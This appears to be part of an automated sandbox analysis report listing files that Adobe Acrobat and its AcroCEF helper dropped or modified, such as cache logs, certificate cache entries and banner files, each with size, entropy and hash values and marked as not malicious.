Entropy (8bit): | 5.201595365938466 |
Encrypted: | false |
SSDEEP: | 6:iO4R/Vlq2PFi2nKuAl9OmbnIFUtSR/VajZZmwsR/VajzkwOFi2nKuAl9OmbjLJ:7+vdZHAahFUt9Z/jz5wZHAaSJ |
MD5: | 8539E371B5AFD1090C6589474A08C6B7 |
SHA1: | 2F717174ACFCE5EC701F57523CC3372BF5856E00 |
SHA-256: | CE0891005699BBE7245408AF17A02FACAD0C69D26A43AF380F1D35C2D52ADED3 |
SHA-512: | 6240B0E990DBB9C22BA029819FAD415E58F331BFAC51D28DE81F4B47A1686E1EBE3E7BC4AFFBA97CBE5093FB768B38F64665BF16C271E15450C033ABE8425A27 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.201595365938466 |
Encrypted: | false |
SSDEEP: | 6:iO4R/Vlq2PFi2nKuAl9OmbnIFUtSR/VajZZmwsR/VajzkwOFi2nKuAl9OmbjLJ:7+vdZHAahFUt9Z/jz5wZHAaSJ |
MD5: | 8539E371B5AFD1090C6589474A08C6B7 |
SHA1: | 2F717174ACFCE5EC701F57523CC3372BF5856E00 |
SHA-256: | CE0891005699BBE7245408AF17A02FACAD0C69D26A43AF380F1D35C2D52ADED3 |
SHA-512: | 6240B0E990DBB9C22BA029819FAD415E58F331BFAC51D28DE81F4B47A1686E1EBE3E7BC4AFFBA97CBE5093FB768B38F64665BF16C271E15450C033ABE8425A27 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.18492131952947 |
Encrypted: | false |
SSDEEP: | 6:iO4R/SVT0HSQ+q2PFi2nKuAl9Ombzo2jMGIFUtSR/SVTYgZmwsR/SVmFYTdSQVkM:71T0HOvdZHAa8uFUtDTh/xhP5wZHAa8z |
MD5: | 35E6B03D6C70B9E0334986327219AA16 |
SHA1: | 937F3EBE3D07DB59E3E8F83745DA65E059DA240C |
SHA-256: | 8D6226FC6461F69350853C900EF6403AFD1078B74D4B159A566C002556D4ED55 |
SHA-512: | 59D31D2F941D6FDA695F6C5AA1CB6058481D1F0F1E2D2C159DA5D7227DD2D10D049DF97DFB9C47C4214B45DC1C286CACC2619E7EF8DDC8BDF934028685264C28 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.18492131952947 |
Encrypted: | false |
SSDEEP: | 6:iO4R/SVT0HSQ+q2PFi2nKuAl9Ombzo2jMGIFUtSR/SVTYgZmwsR/SVmFYTdSQVkM:71T0HOvdZHAa8uFUtDTh/xhP5wZHAa8z |
MD5: | 35E6B03D6C70B9E0334986327219AA16 |
SHA1: | 937F3EBE3D07DB59E3E8F83745DA65E059DA240C |
SHA-256: | 8D6226FC6461F69350853C900EF6403AFD1078B74D4B159A566C002556D4ED55 |
SHA-512: | 59D31D2F941D6FDA695F6C5AA1CB6058481D1F0F1E2D2C159DA5D7227DD2D10D049DF97DFB9C47C4214B45DC1C286CACC2619E7EF8DDC8BDF934028685264C28 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\5bea2524-c22d-4f72-a136-b9464b17ad69.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 476 |
Entropy (8bit): | 4.957464208679992 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqNXSsBdOg2Hdcaq3QYiubpP7E4T3y:Y2sRdskdMHs3QYhbd7nby |
MD5: | 9863286359881C98E62E0E0F382F7283 |
SHA1: | 9832CDCEC2A1186B20F9D48A5C7416A24CE3FABD |
SHA-256: | 23ABDC37F4E610AF686C5C8310C6A2D4F604E1B55C0193B6813728C1E958AFE0 |
SHA-512: | B58A1F139B2E2C78E6BE0BFADF14564119A1454FAD6B9419ADD952449CBDCE98DDEAE0F780D09C1EBE89DD48F207B5949ED25B015026ABF8C754AB894807C87D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 476 |
Entropy (8bit): | 4.957464208679992 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqNXSsBdOg2Hdcaq3QYiubpP7E4T3y:Y2sRdskdMHs3QYhbd7nby |
MD5: | 9863286359881C98E62E0E0F382F7283 |
SHA1: | 9832CDCEC2A1186B20F9D48A5C7416A24CE3FABD |
SHA-256: | 23ABDC37F4E610AF686C5C8310C6A2D4F604E1B55C0193B6813728C1E958AFE0 |
SHA-512: | B58A1F139B2E2C78E6BE0BFADF14564119A1454FAD6B9419ADD952449CBDCE98DDEAE0F780D09C1EBE89DD48F207B5949ED25B015026ABF8C754AB894807C87D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.231032819368155 |
Encrypted: | false |
SSDEEP: | 96:wshFT0h7cA4YC2EVPCqY35NEmNOYcGPtqKYSEVlOxZawXMbr:wshFT0h7cZb2EVKZPEANcGIK5EVlOGwC |
MD5: | 34B88F358A00CAADD255B3BFA5F0BA56 |
SHA1: | ED432B552E82731D45BF13A0DA6C8604AEB9BAE3 |
SHA-256: | D540A71222C44C5F201857C8110463447B04BF3976BFA6117C602EB3F39D841B |
SHA-512: | 5A52BC11F2C1D4F01FEC141F4573E76E0C2026CFC08165F2EE7F818A6A0BE700C9B50CA400A4FEBBCCC0B9881322573579A55BDA02E9DF2C3D04AC8049A527B9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.184234537409291 |
Encrypted: | false |
SSDEEP: | 6:iO4R/SAQ+q2PFi2nKuAl9OmbzNMxIFUtSR/S3gZmwsR/SqQVkwOFi2nKuAl9Ombg:7YvdZHAa8jFUtC/J5wZHAa84J |
MD5: | C9A698AE215B603C41EE117E703A86EC |
SHA1: | 40AE59CE8FA2BEAB060D2A8F30DA7BDC58BA9C5C |
SHA-256: | DE2D9B5118E9CD660ABB0AF9F12BB8B4C67904D67EDE8558D6BF318B7D90C46C |
SHA-512: | 4009DAF4CD5006FC684C0CDFDFF892E4CBAE813288BECE9C0E992D43D6C52BBEFBA4390053F12E83D1237470A1102F896DC3DFAA905F6AB8AF2A593C707482CD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.184234537409291 |
Encrypted: | false |
SSDEEP: | 6:iO4R/SAQ+q2PFi2nKuAl9OmbzNMxIFUtSR/S3gZmwsR/SqQVkwOFi2nKuAl9Ombg:7YvdZHAa8jFUtC/J5wZHAa84J |
MD5: | C9A698AE215B603C41EE117E703A86EC |
SHA1: | 40AE59CE8FA2BEAB060D2A8F30DA7BDC58BA9C5C |
SHA-256: | DE2D9B5118E9CD660ABB0AF9F12BB8B4C67904D67EDE8558D6BF318B7D90C46C |
SHA-512: | 4009DAF4CD5006FC684C0CDFDFF892E4CBAE813288BECE9C0E992D43D6C52BBEFBA4390053F12E83D1237470A1102F896DC3DFAA905F6AB8AF2A593C707482CD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438718147120816 |
Encrypted: | false |
SSDEEP: | 384:Sesci5GkiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:TourVgazUpUTTGt |
MD5: | 498F2B2FB45CA14072C2D9A41196368D |
SHA1: | 853A15D72E08A216EBA82F9B746BA63E0663C8CE |
SHA-256: | 7C0DE4CD6BE00EC8425555DF576F9E3859C3AF98DE43C04DC555940EE24B8708 |
SHA-512: | B2410A5DE299F7B380B0F8E665A30EB3C3149D4E7F4C161B8F4B0C34A27DD433EF2D1B9A578D4EE35C35D1D904E8C2A5CA407E362DC22BD5A877222BC5C33CA5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2120722040882965 |
Encrypted: | false |
SSDEEP: | 48:7MhqMWa/vqvmFTIF3XmHjBoGGR+jMz+Lht:75MD79IVXEBodRBkD |
MD5: | 2935D0648B7A25DBB2C97D33AF246F21 |
SHA1: | 0C8F3B81697B64FFD68DC882FCCDCB223232CF5E |
SHA-256: | B5447018E4E535F9836CE0843A8F213CF73672FD804D61D6B0A5043F3333DE7A |
SHA-512: | 845D99D88549F02ABC676C0FD57F781B84F584BA71E778ED8B076826C8D63731FEBB18FFDAC4A8CF8AB346F9D88273F221552C48C0A650C33FE64CD20950D899 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFklwxaWttfllXlE/HT8k8tNNX8RolJuRdxLlGB9lQRYwpDdt:kKpx3teT8vNMa8RdWBwRd |
MD5: | DCDCAE229FBBFCE15ABE24A1607ADCE0 |
SHA1: | AAE76C02C8B7A4BD5CD3E960E92F5D4DDDF58C83 |
SHA-256: | DD15127EAFB102332AB27702B843F1F895E67362B59261B7030BD7A1DB74706F |
SHA-512: | 4383DA77C00F326C91A43B457BF98CCCBA7A32EA63B8BCC6EFC4BC5124544A30C187622C63DB764CCBFB64FA70EA20981EB1382E35412C51514178DCD14FB156 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.126984036468831 |
Encrypted: | false |
SSDEEP: | 6:kKLaGDL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:xDiDnLNkPlE99SNxAhUe/3 |
MD5: | CE7085AAC4AAF38523039C861E9091DD |
SHA1: | A73E518F0833DFBC09671161ADCF00D25CF48B33 |
SHA-256: | 7F51ACBE0EBA536DDE6BD3D13ABE927EAAADF981187ED7DA7457201A41C100D8 |
SHA-512: | 8568E2808D7B7970A26BC2033114412E04ABF0F35CF58DA400125544762D3969600B209CD334DF780E591806E81BE14416D2A5F441F1F97731362293699C67B0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.352972821950824 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJM3g98kUwPeUkwRe9:YvXKXhhBV2UTbdXGMbLUkee9 |
MD5: | AA4135FD58C0AA645B1E096F9AF98A5D |
SHA1: | D30D0608D5F56BA3859A4B193DD1584534A39881 |
SHA-256: | 888BDB6ADA7A9FDF0CA4FA9C9FA7C9EBC37EC204E75DCF7EA81AA92E5F6C78D4 |
SHA-512: | 97417070C4D7F4F4F861F5B8253071E68A2511AF26979DCA1FB1119DCF6B42B5976A707D0D42AF6EE82CCF701B26D2C0DBE5013BE6B70DC78C5C333DB9B82304 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.291061199858387 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJfBoTfXpnrPeUkwRe9:YvXKXhhBV2UTbdXGWTfXcUkee9 |
MD5: | A7B83B2EBEF4009F16DFEF05F9E5A82E |
SHA1: | 4304CE51D8AFC30112FD88AFF266F4370F866538 |
SHA-256: | 60A9100A1437C3D271CAF7D229DC4B3B6BA9BC102E7171CC3293412007146436 |
SHA-512: | BD03F909F429FBB1D270803024438BBAB6EC47935B7F292A351ADD8FCBBD155A1621DEFA7EC04FF4C388C1D1747107D8208F0EEB7DCEA8D6224AB0B0F315088A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.269320695216194 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJfBD2G6UpnrPeUkwRe9:YvXKXhhBV2UTbdXGR22cUkee9 |
MD5: | 5C15850446C0EC466C493EDE08601273 |
SHA1: | 6613AFC5913D31F8C8E1782601A71E44D4BC658D |
SHA-256: | 38BC9E89F0A22CFDAA3C26348917205B6382E9D69E24B17DE618FB5B6C5455F6 |
SHA-512: | E4C3598482523378516BD837E14FC03B2D3D71CCCD784BDCCD18FBEEB485C53E7FC5C0EA2776BE4200CF9AC651C298DF2B32084ED597003F7968A0867D6AD883 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.326886950633925 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJfPmwrPeUkwRe9:YvXKXhhBV2UTbdXGH56Ukee9 |
MD5: | D438FE3A4D6938E13C87A0DE1E5CB39E |
SHA1: | AE9CBDEAFD79B85F91D995FAE3A7A7B7CF3F6C7C |
SHA-256: | 4427A2F57541287AECDD05AD619E26A84F6F7525713E5186314DAE00DC4D9D7B |
SHA-512: | 2AF2F605B74795B4077440CD7A5FF247E0B786C42FEBB824A594F7C70DA8C28485F84888276741D76D26BBC4D5050F9BC5263CBD29A3776188D47BEA583B4588 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.688261045299012 |
Encrypted: | false |
SSDEEP: | 24:Yv6XhIUXypLgE9cQx8LennAvzBvkn0RCmK8czOCCS2l:YvsIwyhgy6SAFv5Ah8cv/2l |
MD5: | 46D5C2C586812A14FDA5900C32E367E4 |
SHA1: | CA091BBC9F42940611A24957DC5D05A102C69B43 |
SHA-256: | 2AECA28924AD815190F9BE721364AF136AAE3119AEDFD4BDF57C262437D29DAF |
SHA-512: | C22544C0E3569520A9C67EEA45DAE09BE49263DB88EF340CACF19FCEBD98C5FC1D8D060B72426BBE9264BE6BB5FF025B6FCF6ABF5CAE28941F3BC15A03D8ACCF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.267837561858943 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJf8dPeUkwRe9:YvXKXhhBV2UTbdXGU8Ukee9 |
MD5: | 8F3423F430E507F31079689270A84A8D |
SHA1: | 717BB0B9C464DE9486318E3F3A25BA1D734CF075 |
SHA-256: | 834204DAC19481D9D0A48B1FB241CF1BBED91272C967B7FB252DAA698BB681CB |
SHA-512: | FFCFFD591989B74EDED23E3352EF946BDB99FD1A21F5347E8026B089D163EB85000E014A1CE7F66A74D80BD65A0C373CC383D6F867EE8A49E804E8FDD4CEEF6C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.270472425172793 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJfQ1rPeUkwRe9:YvXKXhhBV2UTbdXGY16Ukee9 |
MD5: | F9799E6713AAD3B31DF27EEC58FFAB53 |
SHA1: | 76D031616D6005B7C0EF684944E5622ECCC1FCDA |
SHA-256: | FF8AB1934F284C6CCF89A147DA93D38EE21AC256167D3D0D8B09139A07356376 |
SHA-512: | 6CCD4A7BDCBB229976D2307A8744535EB582657556322DF50FFE062055DA8C30D45F6A0059F21BCDF9EEBA35F52B5951B980DCF86ECD35E001B2128763A1ABB3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.279542452315527 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJfFldPeUkwRe9:YvXKXhhBV2UTbdXGz8Ukee9 |
MD5: | 6B02887F081A8F77D07B9C53BF56F54D |
SHA1: | DE19BF5A6D4EE6DF910AC16B4172EB9E7D9C3BF6 |
SHA-256: | 56299039692A1AB0C196BEF4D424CE1F9998D73A6CB6726D35FDD377D96424FF |
SHA-512: | 171C61708C071F868CB1FAB24AABDD066A13B256C1449E6D8F1AE9D670A15CFF3E0A15A33F15FCBE7E69E174967A9DAD58A06F4225A5FE73B4384AED27D4B51D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.295505307672427 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJfzdPeUkwRe9:YvXKXhhBV2UTbdXGb8Ukee9 |
MD5: | 0E392DB098EC4E244B165DEE80394A9F |
SHA1: | 6B87593C6AEE77155AD45FF1A15E40C8334A94E1 |
SHA-256: | 0CBC35E54CF0CA3252CC5376042DC3B0407BEF5095034CCF90866D5B23BF3AE2 |
SHA-512: | ECB1982B8D350E6A8B1035D7F12A4493DA592737FB571373D35F45D089389F7E3CCAABBC299BE046C00EB6D50FE46E49235D775F387204D003B3E3662D977951 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.275047699102481 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJfYdPeUkwRe9:YvXKXhhBV2UTbdXGg8Ukee9 |
MD5: | FFA06F9647ACB1034874DF99B2BD3A06 |
SHA1: | 5D53B1EC6A9E3997665A188A1822FE40A1D1332B |
SHA-256: | 84CD442EA0DB7A1C7F1A6FF94855C5497AB4034EE604C648FDB216DA63254E90 |
SHA-512: | D8AAC84BBB6824AEB4E4D05E014C0C0895CE2BD8B288232A847BA4172E9C0392521A8EE504B10DA994932557972EDDEE787F36813B3F5644C22B5F4A065C2DC7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.2606587708532135 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJf+dPeUkwRe9:YvXKXhhBV2UTbdXG28Ukee9 |
MD5: | 90C569ADE327F03389B497912777EC08 |
SHA1: | F706E548BAF7FFE7A4316013BAC92230A5008990 |
SHA-256: | D039736E7D8BD7A305C768A03DB2997B5367C4863D1D920CB7FBA9638D7778F2 |
SHA-512: | 253EDA1664E03F5E776B53C7205FFED9CC59B7CC702FEF51213256E77767D9FDF47B6B64158D69D3C2864A55A98B42B5C7DE8D0984055DC7FC985844CB83AB77 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.258766290253302 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJfbPtdPeUkwRe9:YvXKXhhBV2UTbdXGDV8Ukee9 |
MD5: | 35C4039C9DD7282CFB4C08741D26C84F |
SHA1: | D7069A4306E0162F9C0CB56A166DDACE479395E5 |
SHA-256: | 71D27E8297508C953CB5264A67D9C40CFCB9FC72ADC50C5048CB9F1E616DE5FB |
SHA-512: | A5991B4FAEF6F08E4930EDC50737E54E23FF207A76A85722B058AED60CE747FA77F4113FFF028D648B574D557267F3B0370FABAFDDD372CEFDE7DDB8E8FC66D7 |
Malicious: | false |
Preview: |
